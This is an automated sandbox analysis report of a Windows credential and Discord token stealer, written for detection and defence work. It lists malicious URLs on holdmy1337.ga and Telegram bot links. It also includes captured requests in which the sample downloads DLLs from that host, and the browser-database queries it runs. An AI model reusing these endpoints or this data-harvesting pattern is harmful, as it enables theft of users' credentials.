Edit tour

Windows Analysis Report
dBvNa2pTbj

Overview

General Information

Sample Name:	dBvNa2pTbj (renamed file extension from none to exe)
Analysis ID:	662346
MD5:	628e04a5c298a35bd396b74a42d237fe
SHA1:	d90d76f790f1ad0ab95c3bd4bb4fb8dcada77691
SHA256:	66a0c9b894ef78540ddf8b1909b3a227789df7bd4ddcdf5cb3aaf4098493c296
Infos:

Detection

Discord Token Stealer

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Discord Token Stealer

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

PE file has nameless sections

Found many strings related to Crypto-Wallets (likely being stolen)

PE file contains section with special chars

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Queries information about the installed CPU (vendor, model number etc)

Sample file is different than original file name gathered from version info

Binary contains a suspicious time stamp

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

dBvNa2pTbj.exe (PID: 6272 cmdline: "C:\Users\user\Desktop\dBvNa2pTbj.exe" MD5: 628E04A5C298A35BD396B74A42D237FE)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dBvNa2pTbj.exe PID: 6272	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
Process Memory Space: dBvNa2pTbj.exe PID: 6272	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: dBvNa2pTbj.exe	Virustotal: Detection: 54%	Perma Link
Source: dBvNa2pTbj.exe	Metadefender: Detection: 42%	Perma Link
Source: dBvNa2pTbj.exe	ReversingLabs: Detection: 84%

Antivirus detection for URL or domain

Source: https://holdmy1337.ga/assets/dll/x86/SQLite.Interop.dll	Avira URL Cloud: Label: malware
Source: https://holdmy1337.ga/assets/dll/System.Data.SQLite.EF6.dll	Avira URL Cloud: Label: malware
Source: https://holdmy1337.ga/assets/dll/EntityFramework.dll	Avira URL Cloud: Label: malware
Source: http://holdmy1337.ga	Avira URL Cloud: Label: malware
Source: https://holdmy1337.ga/loading.txt	Avira URL Cloud: Label: malware
Source: https://holdmy1337.ga	Avira URL Cloud: Label: malware
Source: https://holdmy1337.ga/ginzo.php?ownerid=	Avira URL Cloud: Label: malware
Source: https://holdmy1337.ga/assets/dll/System.Data.SQLite.Linq.dll	Avira URL Cloud: Label: malware
Source: https://holdmy1337.ga/assets/dll/System.Data.SQLite.dll	Avira URL Cloud: Label: malware
Source: https://holdmy1337.ga/assets/dll/Ionic.Zip.dll	Avira URL Cloud: Label: malware
Source: https://holdmy1337.ga/assets/dll/EntityFramework.SqlServer.dll	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: holdmy1337.ga

Virustotal: Detection: 18%

Perma Link

Machine Learning detection for sample

Source: dBvNa2pTbj.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 136.243.172.101:443 -> 192.168.2.5:49765 version: TLS 1.2

Source: dBvNa2pTbj.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\exe\build.pdb source: dBvNa2pTbj.exe, 00000000.00000002.438636945.000000000B200000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: build.pdb source: dBvNa2pTbj.exe
Source:	Binary string: \??\C:\Windows\exe\build.pdbNw source: dBvNa2pTbj.exe, 00000000.00000003.432950977.000000000B22C000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.438716448.000000000B22C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: build.pdb\build.pdbp? source: dBvNa2pTbj.exe, 00000000.00000002.433315540.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /assets/dll/Ionic.Zip.dll HTTP/1.1Host: holdmy1337.gaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/dll/EntityFramework.dll HTTP/1.1Host: holdmy1337.ga
Source: global traffic	HTTP traffic detected: GET /assets/dll/EntityFramework.SqlServer.dll HTTP/1.1Host: holdmy1337.ga
Source: global traffic	HTTP traffic detected: GET /assets/dll/System.Data.SQLite.dll HTTP/1.1Host: holdmy1337.ga
Source: global traffic	HTTP traffic detected: GET /assets/dll/System.Data.SQLite.EF6.dll HTTP/1.1Host: holdmy1337.ga
Source: global traffic	HTTP traffic detected: GET /assets/dll/System.Data.SQLite.Linq.dll HTTP/1.1Host: holdmy1337.ga
Source: global traffic	HTTP traffic detected: GET /assets/dll/x86/SQLite.Interop.dll HTTP/1.1Host: holdmy1337.ga
Source: global traffic	HTTP traffic detected: GET /assets/dll/x64/SQLite.Interop.dll HTTP/1.1Host: holdmy1337.ga
Source: global traffic	HTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 136.243.172.101 136.243.172.101
Source: Joe Sandbox View	IP Address: 136.243.172.101 136.243.172.101

Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RdnGRD1Gff6EJxZ%2FPmVbfBF6u8DRG7hKTNicZi%2F75lP2psYXR5XLNdBOePYko22idIS5qCzOdIWIWdcKbfBv%2BFBWKEtS9UU5340WpkZEn1XFv76N%2Fn4Eushv9YTp4oC3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a5cab789c00-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MNmrc2sZmN8znbOriV2fmJZxcHLxd0d9wWLSWd6krtqlpwCn9Yl1q0WrvPWjAs%2FWXYgixGG%2FbIht7Y0c%2BCnVd1f5p82wmV71zW%2FFcz5f%2BRs1zEAjPTwFrzz%2BRqog63KB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a5dfd1369a3-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LjXQl57cA4%2F6dF4cETbFWY%2F4dNp2yBM562bgDdk%2FBMq4e5P6Y0k4bEbJ%2F%2FJNnVV5iPZhfbIJ%2B8mpqCFdpUSxlAff80E9d7D24Bk18UtC8LBnBrpbUl3hwwY3fPa45%2BUM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a5f0e8d8fdd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G74D7K65x6MO7hvmX52vMqg7Yoo2eBcD6VtJEYqHN8cyznApMIp8nDFW3zU6Ko6z437bl5g06fuO94vI7K5EF%2FIEXZ%2FGDJwMO3kvqBMWogMpuMT98JfGHJYPyywCeJD1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a6018e59b8f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kZ%2FYZnv%2F58ow6idhGhK3hGeCvZAVvdl%2FMDDH9lIvFHgfEDqRiSQ%2FNWhMUPG7Elo2IsCMbL5BzlZdIHfG0UrQYItlD1K%2B4qQNJrSbONF0ngME74nhonPsPICAToz1K3b5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a60edb8909c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:47 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MIEjGYMh7ZMbaY6M7TJZ%2F5nlqZnNO4FhK5yZ8cPuAjfWwmMM7ylvcevS5bHLmh06iFqdDI%2Brt0y5WIGj2r0CKLSHXC7QAyCX9rIRoueqF49mMxryRVxvRUT176AAAFxw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a620bf6bb8f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:47 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z0PB9Cx3FfEPpYDL1D8eOtKTi0Ma5yQeA6UsjNwo6q7RKvW4z1TVkob37uL0WfFVdnv8gsYY5TL69HY0OBj2ICSMmcZNSIwpTM6wBXYYBsGv6WeFWLtAQFKRgMyb8BB1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a635b209bf4-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Jul 2022 04:20:47 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A9gMCjWMzZvPKB7qd5b5rmk38GSs4%2FVK75C44pp0rZLAsia2bLN9QXNvmp6LlGKIBxDTcqqzcj9i%2BaF6n9lMZJiQ2BKRaPuuoW46ER4GZOrQ6w2klPhSBK0gTIvB7sfg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 729f3a647a896910-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

Source: dBvNa2pTbj.exe, 00000000.00000002.434452190.0000000002F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://holdmy1337.ga
Source: dBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ipwho.is
Source: dBvNa2pTbj.exe, 00000000.00000003.433033972.000000000155C000.00000004.00000020.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.433983096.000000000155D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: dBvNa2pTbj.exe, 00000000.00000002.434389970.0000000002F53000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: dBvNa2pTbj.exe, 00000000.00000002.435874694.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.435855400.0000000003197000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434661304.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.435866825.00000000031A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ipwhois.io/flags/ch.svg
Source: dBvNa2pTbj.exe, 00000000.00000002.434389970.0000000002F53000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://holdmy1337.ga
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://holdmy1337.ga/assets/dll/EntityFramework.SqlServer.dll
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://holdmy1337.ga/assets/dll/EntityFramework.dll
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://holdmy1337.ga/assets/dll/Ionic.Zip.dll
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://holdmy1337.ga/assets/dll/System.Data.SQLite.EF6.dll
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://holdmy1337.ga/assets/dll/System.Data.SQLite.Linq.dll
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://holdmy1337.ga/assets/dll/System.Data.SQLite.dll
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://holdmy1337.ga/assets/dll/x64/SQLite.Interop.dll
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://holdmy1337.ga/assets/dll/x86/SQLite.Interop.dll
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://holdmy1337.ga/ginzo.php?ownerid=
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://holdmy1337.ga/loading.txt
Source: dBvNa2pTbj.exe, 00000000.00000002.434389970.0000000002F53000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://holdmy1337.ga4
Source: dBvNa2pTbj.exe, 00000000.00000002.434619814.0000000002F86000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434842882.0000000002FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://holdmy1337.gaD8
Source: dBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipwho.is
Source: dBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipwho.is/?output=xml
Source: dBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipwho.is/?output=xmlx
Source: dBvNa2pTbj.exe, 00000000.00000002.435806523.0000000003173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipwho.is4
Source: dBvNa2pTbj.exe, 00000000.00000002.435874694.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, Information.txt.0.dr	String found in binary or memory: https://t.me/ginzostealer_bot
Source: dBvNa2pTbj.exe, 00000000.00000002.435874694.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, Information.txt.0.dr	String found in binary or memory: https://t.me/holdthismoneybot

Source: unknown

DNS traffic detected: queries for: holdmy1337.ga

Source: global traffic	HTTP traffic detected: GET /assets/dll/Ionic.Zip.dll HTTP/1.1Host: holdmy1337.gaConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/dll/EntityFramework.dll HTTP/1.1Host: holdmy1337.ga
Source: global traffic	HTTP traffic detected: GET /assets/dll/EntityFramework.SqlServer.dll HTTP/1.1Host: holdmy1337.ga
Source: global traffic	HTTP traffic detected: GET /assets/dll/System.Data.SQLite.dll HTTP/1.1Host: holdmy1337.ga
Source: global traffic	HTTP traffic detected: GET /assets/dll/System.Data.SQLite.EF6.dll HTTP/1.1Host: holdmy1337.ga
Source: global traffic	HTTP traffic detected: GET /assets/dll/System.Data.SQLite.Linq.dll HTTP/1.1Host: holdmy1337.ga
Source: global traffic	HTTP traffic detected: GET /assets/dll/x86/SQLite.Interop.dll HTTP/1.1Host: holdmy1337.ga
Source: global traffic	HTTP traffic detected: GET /assets/dll/x64/SQLite.Interop.dll HTTP/1.1Host: holdmy1337.ga
Source: global traffic	HTTP traffic detected: GET /?output=xml HTTP/1.1Host: ipwho.isConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 136.243.172.101:443 -> 192.168.2.5:49765 version: TLS 1.2

System Summary

PE file has nameless sections

Source: dBvNa2pTbj.exe

Static PE information: section name:

PE file contains section with special chars

Source: dBvNa2pTbj.exe

Static PE information: section name: X99^i@

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_01532028	0_2_01532028
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0153251A	0_2_0153251A
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_01533438	0_2_01533438
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_015318E8	0_2_015318E8
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_01535AF1	0_2_01535AF1
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_01535160	0_2_01535160
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_015333FA	0_2_015333FA
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0153A40F	0_2_0153A40F
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0153A420	0_2_0153A420
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0153049F	0_2_0153049F
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_01536730	0_2_01536730
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_015347B8	0_2_015347B8
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_015367A0	0_2_015367A0
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_015356D0	0_2_015356D0
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_015348A8	0_2_015348A8
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_01535BFB	0_2_01535BFB
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_01532BBD	0_2_01532BBD
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_01533D70	0_2_01533D70
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_01534D20	0_2_01534D20
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_01533C59	0_2_01533C59
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_01535CAB	0_2_01535CAB
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_01531F91	0_2_01531F91
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B3973B8	0_2_0B3973B8
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B39A628	0_2_0B39A628
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B3926F0	0_2_0B3926F0
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B398540	0_2_0B398540
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B398B79	0_2_0B398B79
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B398B70	0_2_0B398B70
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B39896A	0_2_0B39896A
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B398961	0_2_0B398961
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B398FD6	0_2_0B398FD6
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B398FCD	0_2_0B398FCD
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B398DB1	0_2_0B398DB1
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B398DA8	0_2_0B398DA8
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B3973AA	0_2_0B3973AA
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B391258	0_2_0B391258
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B391249	0_2_0B391249
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B398757	0_2_0B398757
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B39874E	0_2_0B39874E
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B3926E2	0_2_0B3926E2
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B398538	0_2_0B398538
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B397549	0_2_0B397549
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B39943A	0_2_0B39943A
Source: C:\Users\user\Desktop\dBvNa2pTbj.exe	Code function: 0_2_0B399443	0_2_0B399443

Source: dBvNa2pTbj.exe	Binary or memory string: OriginalFilename vs dBvNa2pTbj.exe
Source: dBvNa2pTbj.exe, 00000000.00000002.433256734.0000000000B04000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamebuild.exe" vs dBvNa2pTbj.exe
Source: dBvNa2pTbj.exe	Binary or memory string: OriginalFilenamebuild.exe" vs dBvNa2pTbj.exe

Source: dBvNa2pTbj.exe

Static PE information: Section: X99^i@ ZLIB complexity 1.0003801884541985

Source: dBvNa2pTbj.exe	Virustotal: Detection: 54%
Source: dBvNa2pTbj.exe	Metadefender: Detection: 42%
Source: dBvNa2pTbj.exe	ReversingLabs: Detection: 84%

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe

File read: C:\Users\user\Desktop\dBvNa2pTbj.exe

Jump to behavior

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\dBvNa2pTbj.exe

File created: C:\Users\user\AppData\Local\g1nz0l1s7

Jump to behavior

Source: classification engine

Classification label: mal92.troj.spyw.evad.winEXE@1/15@2/3

Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT id,url,title,rev_host,visit_count,hidden,typed,frecency,last_visit_date,guid,foreign_count,url_hash,description,preview_image_url,origin_id,site_name FROM moz_places;
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT id,url,title,rev_host,visit_count,hidden,typed,frecency,last_visit_date,guid,foreign_count,url_hash,description,preview_image_url,origin_id,site_name FROM moz_places;The database that stores the Bookmarks could not be found:
Source: dBvNa2pTbj.exe, 00000000.00000002.434140950.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT id,type,fk,parent,position,title,keyword_id,folder_type,dateAdded,lastModified,guid,syncStatus,syncChangeCounter FROM moz_bookmarks+SELECT url FROM moz_places WHERE id = '{0}';The database that stores the Downloads could not be found: hSELECT id,place_id,anno_attribute_id,content,flags,expiration,type,dateAdded,lastModified FROM moz_annos

Source: dBvNa2pTbj.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
